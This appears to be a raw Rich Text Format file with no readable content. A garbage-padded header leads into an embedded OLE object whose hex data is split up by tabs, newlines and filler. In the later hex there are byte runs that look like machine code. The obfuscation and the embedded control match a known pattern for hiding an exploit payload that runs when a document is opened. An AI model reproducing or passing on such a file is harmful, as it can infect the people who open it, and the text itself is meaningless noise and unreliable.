{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objocx\objupdate\objw6729\objh7529{\*\objdata 940f8 f46
02 0 0 00001 f0000006	84	6	4 e666b4975576b	4
36	2	73	4	44
241 6764 505 7434d51 7	37	76	b494
14	b33620	0
00	0 0 0
000000 000 0	0	00	1 0	0 000	d0cf11e0	a1b1
1	ae10	00 00 0 000	0 0000 000 00 0 0 0 0000 0000
00 3e 000
3
0
0f e	ff0	9
0	00	60	00 0 0 0
0
0 00 0 0	0	00 00 0	0000010
00	000 010
00000 0
000000	000	100	00	0020000000	100	000	0f	e	ffff f f	0
000	00000	0000000	f	ffffff	ffffff
f f ff fff ffff
f f f
ff
fffff
f
f
fff f
ff
f
f f	f ffffff fffff
fff	fff
fff	ffff	ff	f ff f ff
ff	ff	fff	ff
fffffff	ffffff ff fff	ffffff
ff
f
ff	ff f ffffffff	fffffff	f	ffff	ff	fffff
ff ffffffff fffff	f f ffffffffff
f
ff
fff	ff f
f fffff
f f
ff	fff	f	ffffff ff
f
ff	ffff ff ff	fff
fffffff
f	ffffff
f
fff	fffff
ff
f	f	f	f
f
ffff
f
fff f
f f f	ff
f
fff	f
ff	ff
fff f f	fff	fff	fffff
fffffffffffff	fffff fffff f f
fff ffff
ffffff ff ff	ff f fff fffffffff f
ff f	fff ffff ff f ffffffff	ffffff	ff
ff	ff
ff
ff
fff
fff	ffff	f	ffffff fff
f ff ffffffffff ff ff f f
f	f	f	f	ff f
ffff
f	ff fff ffffffff fff ff ffff
ff f ff
fffff fff ff
ff f	ff
f
f	ff	fffffff	ffff	ffff	f	f ff f ffffff	fffffffffffffff f fffffff f
f fff f fff f fff
f
ff f f f ff
ffff
f ffffffff f fffffff ff ff	ffff	ff	fff
ff	f ff	fffffffffffff
ffffffffff	ffffff
ff
f
fff	ff	ffff
fff	f
f	f
f
f	f
f	fff
fff
f
f	ff
fff
f	ff
f	ffff
f	fff
fff	f	fffffff fffff fffffff	fffff	f	ffff f f
fffffffff	f	fffff	ffff	ff	f	f f ff f f ff fff ff	fff f
ff ff	ffff f
fffff ff	ff	ff fff ff f f
ffff	fffff	fffff fffffff ff ff
f
f f
f	ff	fff fffffff ffff	ffff
ffffff	ff
f
ff
f	f fffffff	ffff
fffffff
f
ff fff fff
ff
ff
f
fff fff dffff f	ff	efffffffeffff	f	f04	0000 00 0	5	00000	0060	00	00
0f	eff	ffff	ff	ffffffff ffff ffff ffffff	ff
f	fff	ff	f
f
f
f ff
ff	f
f
f ffffffffffff
f f ff
f fff f
ff
fff ff ff
ff
ff
fff	f fff ff ff	ff	ffff ff f f f	ff	f ffff ff f fffffff f ff f	fff	f	f	fff	ffffff	f ff	ff ffff f f	fff
ffffffffff	ff
f	f
f	f	ff f fff
ffffffffff ff
f
ff
f
ffff ffff f ff
ff
f
f f	f
ff	fff	f	ffff	fffff	f	fffffffffffff	f	f	fff	f	ffffff f f ffff	f
ff
fff fff
ffff	fff	fffffff
fffffff	f fffffff
f f fff
f
f
f
fffff f ff	f
f
f f f	ff f	ff
f	f
f	ffff f ff	f
ffff	fff
fffff
f fff fff f
f
f	f
ff	ff	fff fffff ffffffffffffff
ff ff f
f ff	fff	f	fff	fff	f
f f
ffffff
f
f
f
ff
f
f
fffff fff f f
ffff
ff
ff f
fff
f fffffffffff f ffffffffff	fffff	f	f fff ff fffffffffffff	fff	ffffffff
f
ff	fff	f
f	f	fff	ffffffffff	fffff	fffffffff
ff
fff
f	ff
ff	fff ff	ffffff	f
ff	ffffffffff	fffff fffff f fffffff	ff
f
ff	fff	f fffff f
f ff fff	f fffffff f ff fff ff
fff f f
ffff f	f ffffff
f
fff f
f fffffff f ffffffff
fff	ffffff	ff	f	fffff
f	f
f f f
ff ffffff fffff ff	f fff f	fff	f ff
fff
f	f	f	fff
fff	ffff	f
ffff	fff
ff	fffffff	f	fffff	f	ffffff	fff f ff fff	f fff
ff
fffffffff fff	fffff
f
f	f ff fff ff fff	f ff	fffff f	f	ff f	ff	ffff	f
f f f ff
f ff	f ffff ff
f	fffff
ff	fffff
f ffff ff
f
ff f ff f ff	f	ff	f	f f ffff fffff ffff	ffffff fff fff fffffffff
fffff ffff
f f f
fff
fff ff ff ffff ff
f
ff f
f f	ff	ff	ff	f	ff fff f
fffff f f ff ff	f
fff
ff
fff	ff
f ff 52006 f00	6f0 0
74002	0	0
04500 6e 007 400720079
0 0 0
0
0
0000	00000
000 00	0
0
0
000 00 00
0
0
0	000 0000000000 000000	000000 000000000	00	0000000000
0	0	00 00 0 0
0
0
0016
0	005	00ffffffffffff	ffff01	00
00000	2	ce	0
20000
000000
c0	00000	0
0
0	0	00	0
46
000
0	0000
0	0 0
0
0000 0	0
0
0000	0e04	6ad9 2c82
2d
4 010300
00 00800
7	0000
00	0
000	0	0	01004f0
06c	00
65	0	0
31	0	0	3 00 0 4 e0061007 4006 900
7600
6
50 0000	00000	00 0	00 0 00
00	00	00 0
00
000 0 0	0 00 0	0 000 0000 0	00 000	00	000	0	0	00
0	0 00	0	00000000	00	00	0000001a000
201ff
f	ff f
ffff
fffff f	ff	f f	f	f	ff	0
00	0
000	0
0000
0 00 00 0 00	00000000
00	0000
00000000 00 0 0 000	000000000000	0	0	0	0	0	000000000000
00
6
c070	0	0
0	0	00
00	0
00
00
00
00	000	0000	0000000 0 0	0	0 000 000 00
000 0000000 0	0	00000	00	000	0	0000 0000 0 00000 0 00 0	00
0	0
00	00000	0000 0 00 0000 0 0000000000000 0 000 000 0000 0 0 00	000	00000	0000f	f
ff	fff
ff f
fff f
ffff	f	f
f	ff	f00000000	000000	000000	00000
0	000
000
0000	000000	000	0	000000 0000 00000 00000	0000	0	00	000000000
00	00
000
00
0000	0 0000	0	000	000
0	0
0 000	00
0
0
00	00	00 00000000 0
0000000 0000000 000000 0
00 00 000000 00 0	00 0 0000000000 0 000	000	00	00	0
0	00	00 0
00000000000000 00000 000000000	0000000ffff	fffff
ffff	f
f f	f f	f	ff	ff	f 0000
00 000
0000 0
000
00 0 0 00
0000000 0
0	00000000	0	00
0 0
000 0 0 00 00
00000 00 00000 00 0 000000000 00000000 0 000
00000 00100000 00 20
0000 0 03 00 00 000
40000	0	00 50
00 000
0
6
0
0
0
0000
7 00 00
00 080
000
00 0900000	00a000
00
0
0b0
0
0000	0c0000	000
d000
0000e0	00 00	00	f000	000
1000
0
0
0
01
1
0
0	0	000120 00000 130
00
000 1
400 00 001500
0	0
0 0
1 6000
0 001	70
000 00 1
800	000	019	0
000
001a0	00
0
0	01b00
0
00
0
1c00
000
0	1	d0
0 000 0	fe ffffffffff	ffffffffffffffff	f ffff fff fffffff fff f	ffff
ffffff
ff
f
f f ff
ff	f	ffff
f
fff
fffff	f f f
fff ff
ffff	ff	f	ff	fffffffffffffff	f	f ffff ff fffffff
fffff ffffffff ff	fff
f	fff
f
f
fffffffff	ffffffff
f	fff
fffffff	f	ffff
f f
fffff f f
f
f f f f
f	fffffff	ff f	f	f	ffffffff	f	ff ffffffff f f ffff ffffff	ff	f f
ff f f f f f
f f fffffff
ff	f	fff	fffff	ff	f	ffffffffff
ffff	f	fffff f	ff	f fff	f	f ff
ff ff ff
ffff f f ff f	fff	f f ffffffffffffffffff ff ff ffffffffffffff f
fffffff fffffff
f	f fffff f f
f
ff
ffff
f	f
f
fff
ffffffff	fff
fff	f
ffff
f
f	f	fffffffffff	fffff
f
ff
f	ff	ff
ff	ff
ff f ff	ff f
f	fffff
f	f	f
f
ff
f
ff	f	ffff
f	ffffff	ff
ff
ff f
ff f f
f
f
ffff f f fff f
f
ffffffffffffffff f f	ffffffff
fff f
f
ff
fff	f	f	fffffff
fff	ff
ff
f
ffff	f ff
f fff fff f ffffff fff	ff ffffff f f fffff f ff fff
f fffffffff fffff fffff	ff f fff	fff	f	ffff fff fff	ffff	ffff
f	f
f fff f
fffff fffff
ff
f ff	fffff	f	ffffff
f
ffff
fff
f
fffffffff ffff
f
ff
fff	f
f	ff	ffffff
f	fffff	f	f f
fff f
fffffffff f f fffffffffffff ffff
fffff	f	fff
ffff
fff ff	ffffff6 8
07
0
0
0 0 022
1 0
10dea0a
010 8
1 4b
e b9
3
3 f
4
b	36	0	81	e9f7366e 608b 31	8b	2
e
ba2
2	e	1
1ebf
81f2	9
28658bf8b	1
a
5
5f fd30
5a0d4ce5	005 8e2c3 1
aff fe06 c4	0bc42006ce3	3d3d5f3 f c	e356a7abd885
255
d	a	1	10	bab4	5715f06ab90f392	6c d	1
c72 61 3	a3	75
14 e6 c	ff
5a	70
4 2 cec
d1119 2594
84
b416f
1 04 5	0e	7c
4
f98	85	e ec1	0cde715 648
7 ce d	9e18	2	d15a	f0507	3a3e 042	11ec8	bdd866d7fef	cf9a 56 f	15	fc82a9 1e f97ca 8
dd
a	9 08
553 85
2 bbf	8 9 a	9a4	60e
0 4 6b 4798
a42f2f7 68e fc3 4f223	8a3ef00bf b8 df8e7dd	9d1
93a6	0	b0	bee	09d3	8	926c	a	5417	19	6e	6ff99
823c
a3	9 840
56 a37f0
a
a 685
a7
d d 8
d
6 e4
f
ddfbfb e
4
762ea3 ea6d
4530 9	8	c3	fb7cd5f50	51f0b97	7024e c e 1b2e 2de291 0	4cdc387f8	c	b29 b8 45f
e7
0 1d296 8d
6
8a b
9
b0	3
6
9	35 5ca7
7d
c	3	7 5c141f e2 97
8d	5	8 d
5295385 35	7 1b b
7b 87 e 49 87 6cf606df0	e95ed
45e	9210
10000a	d1 801
b f2 4962e25
f
4	3	d
3
7
16 5b	b
9
3 5
4e5
d a 5a49e01d3a 4278e	8a	3
aa2d7c08	e99
6	8622
cac	de9	64	6
cf0	e	eced86 5ab
15 b
31
e 1
202c3	d	cba
a
a1	6	c8	23
6	d	e16f 45c	2 967 d5aa329ed 8e 147 4ef a 3 79d	9
db8948a8956d5cf20160d	c7c5	87	bf	ba6eb4	2	70eea	72	7	090	1	395fb b22
038	9
f
c 5d
8f9e
543 d 6
3a	4	a09 c
963
7e	96	b21d
a6
4	f2	c	959	fbb	a0
c
1
32	c88e
92
6204 c	a4	7	a 5e7b99b2306 9 912f95c
b 6	32 7b
8d b7 c36a
1ccf 1743
b 1 0d
3f715
88e5	096c2 c 8a6 c 8	82be1ccf	4f4f58 6 849 6
80 0
8 5 2e
4efc8ca
3	d7	ba 95
70 a
e7 0 a d c 29	3	4f176	7
9 a d 586
15690067
a 37b91 1 3
4f
6150	1df9fc448a64c4f	f1
278
05d	0	66841e1
065	75 c25	66
42138 c46b819d3a7a	ef1ea0c0 6b3d1ee4 d
d 17 6 33
f 4a91 e21 d 1fad10006c beaad
c 2 6
adeb5 d
653
3
d51 f a 6
1e 72
f
1
07950 81 b8e 4c6
9966	5 d2255 6e9 7 70100009 c53505 3	05aa	430000
05	3c
54
0	00081
ebc20e00005b9 c
57565
3	81	c7ae
15	00
008 db 67a3
c
0
00 0
8
d	9b
0
4
65000 0	8	1c7eb0a
0	00081e	b
2
04	c00008db
e	9e	7800005b	5e5f9d58	5b	9 d
eb05
e9 d70000 0	05eeb48e b07
e9
e9
000	0	00eb	44	e
8a
101 000 0
eb3658
9c5681	c6
46
3f000	081e
e	13	4c0	00081	c6
4375	00	00
5e9d5feb15eb 07e b cf e9
d00000 00 0 5b5 1 4	ef3c310	6	e9d3000000e	9	e
9	00	00
00ebed	e
b
c8 83 c64cebb 5	e9
d
7 000	000	9c	5
7	5 6 5
7	8
1e f
da37
00
0 0
8 1 c7ce7f
0
00
0 5
f5e5f
5	75	f9de b6a	9c535	753 8db f e250000081c7023b
0000 8
1
e b
e f
0d 0 0
00908 dbb	3	23 c0 000	5b5f	5b9de9	86 0
00000 9c
5 381c
3
c6
0
f0 000eb0662f76
3 7
8a 69 f8
d9
bac
3400 008d9
b 095e0
0008
1e
b8 5 1 10
00
05b9 d
eb289c568
1e e291d0	00	0
81
e
e2	24	d00	0	08db6
277d0000	5e9	d8d8
f7	3 fc ffffe
b 2f 69c0
87
0
c 3a	7a
eb	3ae	b 4 6
e81af
ff
f
ff	e9	0e
f
fffffeb	062	2 7 b
d4 e0fc
4 b8d be
8	d030
0
0
06	bc000e	9	6
a	ff
f	ff	f	e929ffffffe9 0 1f
f ffff
e90
3
fffff fe918f
fffff
e b07eb17 e9 18f fff	ff83	c	6	0439	fe72b2eb	a8e
9d4f e fff
f	57	5	0eb8
75ec3d	d	149b	3 c 5
c 7c8	d86	f	76d52	7fff97c5 eb0ae 3d	f1497ba	7 d c 018
4dc1
d a8 e	cd1	c32	7	2	049ea5	b	c375 ed 84	0	df6 6fe 1
ce	1 c7 4fb13 68483
e b 32c
9a1
a	d
e2	1	3 4	e3a	13
27
cc10	3b67	1f0de	bb257a	8
1	8
a	3c	45ca30	e 6	b70d20	47e	7d
a	2	2
839	6
e
4
0b	5	b
cb2
d
0e7	3893
ba3	6	1
a	44970b09c	8
1919d	cdedc297	4e8b5	f6d 9f6091 d68e565 c71
f8
0	0
6e	85	f
6	00
b	7da844
7
2
7 a1
44 d6
a e a
3490 0
7 c
2 a5
6 c5d
6a c687
9	6fa6	25
2db	3	d23dd	4b2fc9	0	0	2	9 5 2a1b 784 f1 df ac74ea
9 3 750fc
1c	0ba
ab837 e f00 3d5 745
d81e 6 85 4	d65
115	a0a1 7
fba 8b88141 4
60dc
e
f1ae1b d4fe 9b
5
a	f 05 c
8 fbc43e2 9c
b d
8
5b69
ca6fc
cb
4da 8 77 8 fb 9f9f1 bff2bb
873 2
203 073	5f1 1fde ecfe10a	a7fa	e	ee0342 5 37 d	00	6	e	a844890d9ff	59
7d8d
78
4655c
65e2f
fb
bc	fb61
0 e5 f57 929 7a5
a 1f0	4	d4 f1 75fe5	08bfa06	f0	f52	37
9
e	1	79bf	d01d73	28 df1a52e	b 4f52a7e4 ea5348e ddc5f78	7	40
2
02	51c8
9e86
47b	3a0
2b
8c51	8f bf
1
1 4e f
c20bc
0
4
f
cd3d
56b3727
c
7 6c	2b	44b20e4c	e
a 4
32b
fd
4e
8ecf42
a15 04b fbb
557 a3	d4
1de9
67
a0	f71	6f8bd900ff9d4f	4f	5 2
09 7 6acf7b ec 8	28	a2a83 7 e71
0	41	c d6e0e dbe9
6 2 6 2d5
a44 fd02 9
ae9ff3
fddd5e 0d 54ef10 b58d	7	6 3 356
4 c
9
3
e02b4	84c b	56da7	6f2b	40ce4dc	9
255c5	cfb	a
1
5d	d2dec24baea2a 2	ad
e3c e	1bd	8	26b5	c e79854ab89
b	c
b 208 d2cc 560c 3cd	6	1e638	f	462
f0	9db11	b9 b0 620b e86a ca3 7ad 0aab491e87231f 3b39 41
9050d5 1 44f888
4
d 96 1261f 4
d
0f	1214 e	76c	eb6	3	9	c3b6d4f	74	e878
e	1
2 8
e2 b
23
63 a7	d	1e
8
e	571	9	19e	5f3
06	b
e7
ef
ac0
1 98bc73	bf	86e1f1d74968 59 1c7 6d4
8 85a5961a32
f1
cf 8ee60 27
812539	849b	2
6ae5de	2 0	2f
c
ce	9
9	9	8	c	5
b	f	96
8	f	9a2540129	61a ade523 7 177f95e96
e
63	f3	0bed	80b
a8 6
f 2
bd4 a a94b
8
0	01	1
50	b
7 08e cd bd e e 764	4f
f0c
0
d742 e3	d8431a5	3	9	dfbce73	0	3e04a
5568
3	09 2 4fa8
3
45
e
f f8
4cd3 2
a	4	9
7e16d
f226d2a8
3d
7	0aa	4
5 9bf	2
dfb	e	6b	2
19
e
0
a88	73381 b
4c3
c5 7
768 da
d
c
a55ee2a 4a853
0
8c 08	cc2 000f
b f4
a 55 d9e 2a
4	5ab
f	38 3e8879e c89b 8d 63 ae e63e a 4823c
be3 3d
c
e
2c905 71bdb
8
cae
e3
c
b
09b
b
89
76
0
11242e34 d a2c
22e
a1
d4
0
551 4	0	49b8b30	c2c 3a505	89ae763de	6d77972	027 8	a064d 5354 9c625 4d9b2f735 674cdaeaeb8bcb	3240e6	55	f8322f85	1	0	72d
7da b	aa7c
d4e
4
d8	5376b	0	d	8	14c87c4b2c2de03790 7 03d 48 698108567af466
6db 4
8	92 c 6d
49
2c	5f
57
ed	6c	cc52	e	d6 8 62
6 adcc8a1 453
07 e
0e3c7
c	5 3
aa f	c3c56d4	dab849321 c 6d895	93 cb8 820b6f290 04e9d23	e d9a0c8 bdea 64a97e6 6642 ce cc
60 cc 7 69d466731e4c806bb5 4e 19b56e544226 424 6	6	f	6a4	35d59	0d
9e
5
0
0
0	0 0 0
00 0
0000000000 00 0000000	0000000000	0
00	0	00000	000	0
0000 0000 00000 00000000
0
00 0
0000
0 0 0 00000
0 0000
0
0 000
0000
00
00
00 0 00 000
00 0000000 0
00 0000000 00 0000 0000 0	0
000	0	000000 000 0
000
0
000 00 000000000	0 00000
00
0	0 0 0
00 0	0000	0
00000	0000	0	00	0000	00
0	0
0	000000 0000	0 00 0 00 0
00 000	000
00	00
00	0	0	000000000	0
0
0
0	0	00
00	00
000000000000000	0 00 00000	00f	f4	9	58	4	30 00 00 0 00}}}